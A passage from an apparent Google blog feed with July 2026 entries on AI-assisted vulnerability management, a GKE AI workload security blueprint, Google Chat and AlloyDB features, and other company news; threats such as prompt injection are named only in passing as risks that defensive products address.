&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;Post-deployment controls&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Even with human review and deterministic test harnesses, AI-generated patches can still introduce logic regressions in production. Organizations should implement strict post-deployment controls:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Automated rollbacks:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Treating LLM-generated code with the same post-deployment scrutiny as any major architectural change ensures that if an unforeseen regression traverses the CI/CD pipeline, the environment can revert to a known good state.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Mitigating model drift:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Relying on managed AI services introduces the ongoing risk of model drift. To prevent silent weight updates from breaking test harnesses, organizations need to pin specific model API versions to frozen releases. When a pinned version reaches its end-of-life, organizations will face a forced migration. Mitigating this pipeline fragility requires combining model pinning with deterministic regression suites.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Compliance and auditability:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; If an AI agent automatically closes a security ticket or generates a patch in the CI/CD pipeline, organizations should maintain immutable audit logs to satisfy frameworks like SOC 2 ,PCI-DSS, FedRAMP, and CMMC. National security deployments must also account for data sovereignty requirements. This logging should record the specific model version that proposed the fix, the deterministic test results that validated it, and the human engineer who approved the merge. Furthermore, because emerging legislation like the EU AI Act emphasizes human oversight for high-risk applications, security teams should carefully evaluate how autonomous remediation workflows align with these evolving global regulatory standards.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="demistifying image 7" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Screenshot_2026-07-15_at_10.24.22PM.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 7: Flowchart demonstrating the difference between local IDE AI remediation and centralized CI/CD pipeline remediation.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Conclusion&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Leveraging LLMs in vulnerability management is a multi-layer solution: Integrating it requires separating workflows by layer. At the enterprise infrastructure level, Risk-Based Vulnerability Management (RBVM) and exposure management are necessary to process the volume of findings and configuration drift. At the product and code security level, LLM-enabled vulnerability assessment and remediation must operate alongside foundational deterministic controls, such as SAST and DAST, to audit custom, open-source, or third-party code.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Although LLMs can help manage technical debt and accelerate vulnerability discovery, they do not replace secure-by-design principles. The fact that LLM agents are proving exceptionally capable at identifying and exploiting localized memory corruption in memory-unsafe codebases, alongside other primary vectors, should serve as a wake-up call. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a long-term strategy aligned with &lt;/span&gt;&lt;a href="https://media.defense.gov/2022/Nov/10/2003112742/-1/-1/0/CSI_SOFTWARE_MEMORY_SAFETY.PDF" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;NSA guidance on Software Memory Safety&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, organizations need to phase memory-safe languages into new internal development. LLMs are beginning to expand what is possible here by reducing the manual labor required for code migration. Converting existing C or C++ codebases to Rust has historically been unrealistic due to the large volume of engineering hours needed. While fully automated translation is not a turn-key solution, using LLMs to assist engineers with the bulk of the conversion can make these long-term migrations operationally viable. Beyond internal efforts, organizations should use procurement requirements to incentivize vendors to reduce their reliance on memory-unsafe languages and establish secure configuration defaults over time. Bridging the gap between AI velocity and enterprise defense means building an automated pipeline to manage the current backlog, while architecting systems where entire classes of vulnerabilities and misconfigurations are eliminated by design.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Acknowledgements&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This analysis would not have been possible without the assistance of Google Threat Intelligence Group (GTIG) and other broader Google teams.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/ai-assisted-vulnerability-management" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-16T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/the-dma-should-not-undercut-security-privacy-for-europeans</id>
    <title>The DMA should not undercut security &amp; privacy for Europeans</title>
    <updated>2026-07-16T12:05:00+00:00</updated>
    <content type="html">Today's decisions risk undermining vital privacy and security guardrails for millions of Europeans. We have repeatedly offered solutions to safeguard users while satisfy…</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/the-dma-should-not-undercut-security-privacy-for-europeans" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-16T12:05:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/securing-ai-at-enterprise-scale-the-google-kubernetes-engine-blueprint</id>
    <title>Securing AI at Enterprise Scale: The Google Kubernetes Engine Blueprint</title>
    <updated>2026-07-16T11:28:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Artificial intelligence is moving from prototype to production faster than traditional security paradigms can adapt. For CISOs and platform engineering teams, the challenge is clear: you need to protect proprietary model weights, defend against novel application-layer threats like prompt injection, and enforce strict regulatory compliance—all without slowing down your AI developers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To meet all of these security goals, you need more than just a place to run containers; you need a platform that compounds layers of security out-of-the-box.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, we're sharing our blueprint for &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/security/ai-security-best-practices"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Best practices for AI workload security on Google Kubernetes Engine (GKE)&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This blueprint consolidates controls across multiple Google Cloud services and GKE features to help you to build a secure-by-default GKE platform that handles the realities of AI at scale.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The AI workload security blueprint for GKE identifies three critical layers of the AI stack. Here's how Google Cloud and GKE approach security at each of these layers.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Infrastructure Layer: Hardware-Attested&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; Execution&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can't have a secure AI workload on an insecure cluster. The infrastructure layer is where GKE provides a security baseline that most enterprises spend years building independently.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Confidential Accelerators:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Heavy inference workloads handle your most sensitive data. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Confidential GKE Nodes&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; extend hardware-level memory encryption and attestation capabilities to high-performance accelerators, including &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Confidential GPUs (e.g., NVIDIA H100)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; and TPUs. This protects your intellectual property from hypervisor-level compromise and infrastructure operator scraping, providing hardware-attested confidentiality.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Zero-Trust Networking &amp;amp; Identity:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; GKE enforces least-privilege by default. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Workload Identity Federation for GKE&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; ensures inference pods can securely fetch model weights from Cloud Storage without long-lived keys, while &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;VPC Service Controls&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; create a strong perimeter around regulated workloads to prevent data exfiltration.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Model Security: Provenance and Behavioral Integrity&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you are deploying your own models—whether fine-tuned or open-source—you own the safety and integrity of the weights. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GKE integrates deeply with Google Cloud's supply chain tools to ensure what you train is exactly what you serve. Traditional SBOMs do not capture AI artifacts. GKE uses &lt;strong&gt;k8s-aibom&lt;/strong&gt; (AI Bill of Materials for Kubernetes) to generate comprehensive inventories of your models, datasets, and frameworks and give you enhanced supply chain visibility.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Application Security: Defending the Inference Path&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The application layer is where you have content access and where novel AI-specific threats (like prompt injection and data leakage) emerge. Google Cloud provides purpose-built services that sit directly in your GKE inference path.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Content-Layer Defense:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Model Armor&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; sits between your application and the inference endpoint. It inspects every prompt and response for prompt injection, sensitive data exposure (PII), and harmful content generation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Session Management:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE Inference Gateway&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; provides session-level observability and quota enforcement. It allows you to enforce per-user rate limits and detect abuse patterns, such as session manipulation or inference cost abuse.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Agentic Isolation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; When your AI acts as an agent—executing generated code or interacting with unverified third-party tools—it must be contained. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE Sandbox (gVisor)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; provides a secure isolation boundary that prevents container escapes and protects the underlying node from unpredictable agent behavior.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;A Phased Approach to Security&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security on GKE compounds. We recommend a phased approach to securing your AI deployments:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Phase 1 — Deploy (Your Baseline):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Implement the foundational configurations. Enable Workload Identity, deploy Model Armor in front of inference endpoints, and run sensitive workloads on Confidential GKE Nodes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Phase 2 — Operate (Your Hardening):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Turn your prototype into a production system. Enforce signed-image policies with Binary Authorization, tune Model Armor profiles, and aggregate audit logs for cross-layer SIEM correlation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Phase 3 — Govern (Enterprise Scale):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Automate compliance. Establish organization-level guardrails with Organization Policy Service, enforce admission-time policies via Kubernetes webhooks, and automate incident response for high-confidence detections.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our AI workload security blueprint provides you with recommended controls and security measures for each of these phases. Additionally, the blueprint includes foundational guidance for observing your environment over time.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Next Steps&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The race to deploy AI should not be a race to the bottom for security. By building on GKE and integrating with Google Cloud, platform teams inherit the infrastructure security baseline that Google has been refining for over a decade, paired with purpose-built AI defenses.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To dive deeper into the specific threat models, architectural patterns, and the complete maturity self-assessment, read the full &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/security/ai-security-best-practices"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Best practices for AI workload security on GKE.&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/securing-ai-at-enterprise-scale-the-google-kubernetes-engine-blueprint" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-16T11:28:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-cloudblog-publish/images/GKE-AI-Security-Hero.max-600x600.jpg" type="image/jpeg" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-cloudblog-publish/images/GKE-AI-Security-Hero.max-600x600.jpg"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-cloudblog-publish/images/GKE-AI-Security-Hero.max-600x600.jpg" type="image/jpeg" length="0"/>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/our-approach-to-bioresilience</id>
    <title>Our approach to bioresilience</title>
    <updated>2026-07-16T09:30:42+00:00</updated>
    <content type="html">Google DeepMind and Isomorphic Labs are sharing our joint approach to bioresilience and AI models.</content>
    <link href="https://deepmind.google/blog/our-approach-to-bioresilience" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-07-16T09:30:42+00:00</published>
    <media:group>
      <media:content url="https://lh3.googleusercontent.com/ZRyQg91pjea8kXXaGSlnZIJF90-VwnKHSBxo22e2RedCvCCszsurR8W9NHw80e1V6HtWXccbU1MI27Rtjjf963rD673XgkWK7cZe_1ekfruPgdHHVEc=w528-h297-n-nu-rw-lo" type="image/jpeg" medium="image"/>
      <media:thumbnail url="https://lh3.googleusercontent.com/ZRyQg91pjea8kXXaGSlnZIJF90-VwnKHSBxo22e2RedCvCCszsurR8W9NHw80e1V6HtWXccbU1MI27Rtjjf963rD673XgkWK7cZe_1ekfruPgdHHVEc=w528-h297-n-nu-rw-lo"/>
    </media:group>
    <link rel="enclosure" href="https://lh3.googleusercontent.com/ZRyQg91pjea8kXXaGSlnZIJF90-VwnKHSBxo22e2RedCvCCszsurR8W9NHw80e1V6HtWXccbU1MI27Rtjjf963rD673XgkWK7cZe_1ekfruPgdHHVEc=w528-h297-n-nu-rw-lo" type="image/jpeg" length="0"/>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_16_2026</id>
    <title>Cloud Release Notes — July 16, 2026</title>
    <updated>2026-07-16T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Oracle Database@Google Cloud&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Oracle Database@Google Cloud supports cloning for Autonomous AI Databases. You can create full, metadata, and refreshable clones using Google Cloud CLI and API. For more information, see &lt;a href="https://docs.cloud.google.com/oracle/database/docs/clone-autonomous-database"&gt;Clone an Autonomous AI Database&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This feature is &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Generally Available (GA)&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_16_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-16T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/were-partnering-with-screwfix-to-help-the-nations-tradespeople-nail-admin-and-grow-their-businesses-using-ai</id>
    <title>We’re partnering with Screwfix to help the nation's tradespeople nail admin and grow their businesses using AI.</title>
    <updated>2026-07-16T07:00:00+00:00</updated>
    <content type="html">Four men in workwear interact at a Google promotional booth outside a hardware store. The setup features a barista serving coffee, tall Gemini banners, and a digital screen showing the Gemini AI interface inside a partially constructed room.</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/were-partnering-with-screwfix-to-help-the-nations-tradespeople-nail-admin-and-grow-their-businesses-using-ai" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-16T07:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/image_-_2026-07-16T082559.246.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/image_-_2026-07-16T082559.246.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/image_-_2026-07-16T082559.246.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://research.google/blog/towards-demystifying-the-creativity-of-diffusion-models</id>
    <title>Towards demystifying the creativity of diffusion models</title>
    <updated>2026-07-15T18:06:27+00:00</updated>
    <content type="html">Algorithms &amp; Theory</content>
    <link href="https://research.google/blog/towards-demystifying-the-creativity-of-diffusion-models" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-07-15T18:06:27+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/now-available-group-conversations-with-external-collaborators-in-Google-Chat.html</id>
    <title>Now available: group conversations with external collaborators in Google Chat</title>
    <updated>2026-07-15T16:21:06+00:00</updated>
    <content type="html">&lt;p&gt;For many teams, it’s essential to be able to work in real-time with partners from outside your organization. We’re improving external collaboration in Google Chat by making it possible to create group conversations that include external users.&lt;/p&gt;&lt;p&gt;Previously, teams using Google Chat could only create 1:1 conversations with external users, or create a space in Chat with external access enabled.&lt;/p&gt;&lt;p&gt;With this update, it’s now possible to create group conversations with multiple external users, reducing friction and streamlining external collaboration. No additional configuration is required, and access for external users is enabled once they accept an invitation through an email notification. Group conversations with external members are labeled with a visible badge to help ensure that users are aware of the context for all conversations in Chat.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6NMFsK1y_ILcyeP2R1BozsLmoPhCZ9zPNIBJ2kvU8W7p_D9Umv5EAAvY8VVZK_EOtEOCbIbGJ-Wv4xBgRYQ-xMATEAkoZqR-1HzUILp-LLmZ_rHbwPSqSRY_F-YaQQ0xsUeZ2wlEiq4R9DZSQm1f0XSJqiQK-X9_PdtU5M40MNvFer3-klFKLlOOW0c/s1600/Now%20available%20group%20conversations%20with%20external%20collaborators%20in%20Google%20Chat%20-%206854.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6NMFsK1y_ILcyeP2R1BozsLmoPhCZ9zPNIBJ2kvU8W7p_D9Umv5EAAvY8VVZK_EOtEOCbIbGJ-Wv4xBgRYQ-xMATEAkoZqR-1HzUILp-LLmZ_rHbwPSqSRY_F-YaQQ0xsUeZ2wlEiq4R9DZSQm1f0XSJqiQK-X9_PdtU5M40MNvFer3-klFKLlOOW0c/s1600/Now%20available%20group%20conversations%20with%20external%20collaborators%20in%20Google%20Chat%20-%206854.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;External group DMs share the same admin controls as external spaces. Ensure that the &lt;a href="https://knowledge.workspace.google.com/admin/chat/control-external-chat-and-spaces-chat-options#externalspaces" target="_blank"&gt;External spaces &amp;amp; group direct messages admin setting&lt;/a&gt; is enabled for your organization to allow users to create or join external group DMs.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; If allowed by their admin, end users can add external users when they create a new group DM. External users can’t be added to existing group DMs that only have internal users. External users who are added to group DMs will receive an email invitation and must accept the invitation to participate in the group conversation.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains:&lt;/a&gt; Rolling out now, with expected completion by July 17, 2026&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on July 24, 2026&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers and Workspace Individual subscribers&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Chat Help: &lt;a href="https://support.google.com/chat?p=External_gdm#topic=7649316" target="_blank"&gt;External group DMs in Google Chat&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/chat/control-external-chat-and-spaces-chat-options#externalspaces" target="_blank"&gt;Control external Chat &amp;amp; spaces chat options&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/now-available-group-conversations-with-external-collaborators-in-Google-Chat.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-15T16:21:06+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/databases/how-alloydb-overcomes-indexing-limitations-with-ai-functions</id>
    <title>How to solve PostgreSQL multilingual full-text search limitations with AlloyDB AI</title>
    <updated>2026-07-15T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AlloyDB powers enterprise-grade search for some of the largest organizations, providing robust hybrid search capabilities that combine text, vector, and keyword searches into a simple ranked SQL query. And with our recent launch of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/create-rum-index"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RUM index support&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, AlloyDB customers now have even more powerful full-text search capabilities at their fingertips. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, database developers often face limitations when indexing continuous text in logographical languages like Chinese, Japanese, and Korean, where traditional whitespace-based tokenization fails. Gemini’s multilingual capabilities enable you to intelligently parse text in these languages to implement intelligent word segmentation and stop-word removal, but orchestrating row-wise API calls on massive datasets is slow and fragile. Now you can integrate the world knowledge of Gemini models natively into your database using &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/ai-query-engine-landing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB AI Functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, enabling highly accurate full-text search for logographical languages without the administrative overhead of complex ETL pipelines.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Continuous text and logographical languages&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To understand why this native integration is such a significant advancement, we must first examine the underlying mechanics of text search and why traditional indexing methods fail when processing continuous text.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To build an effective full-text search index in PostgreSQL, the engine must parse text into search tokens (lexemes) using the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;to_tsvector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; function. By default, standard text search configurations like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;simple&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;english&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; assume that words are separated by whitespace. The database engine extracts search terms by splitting the input string at these spaces.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, Chinese and other logographical languages do not use spaces between words. Words are written continuously, with punctuation serving as the only boundaries. Because of this, standard PostgreSQL parsers fail to extract individual keywords. Instead, they treat entire sentences or long clauses as a single, continuous lexeme.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, consider this input string: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;"你们研究所有十个图书馆"&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;(Your research institute has ten libraries)&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Without spaces, passing this to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;to_tsvector('simple', ...)&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; produces a single, massive lexeme: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;'你们研究所有十个图书馆'&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you search for &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;"研究所"&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;(research institute)&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;"图书馆"&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;(library)&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, the query fails to return a match. The keywords are trapped inside the larger string, forcing you to search for the exact, long-form sentence to get a result.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Traditional workarounds and their limits&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You might try to resolve this using traditional tools and pipelines, each of which introduces significant operational friction or accuracy limits:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
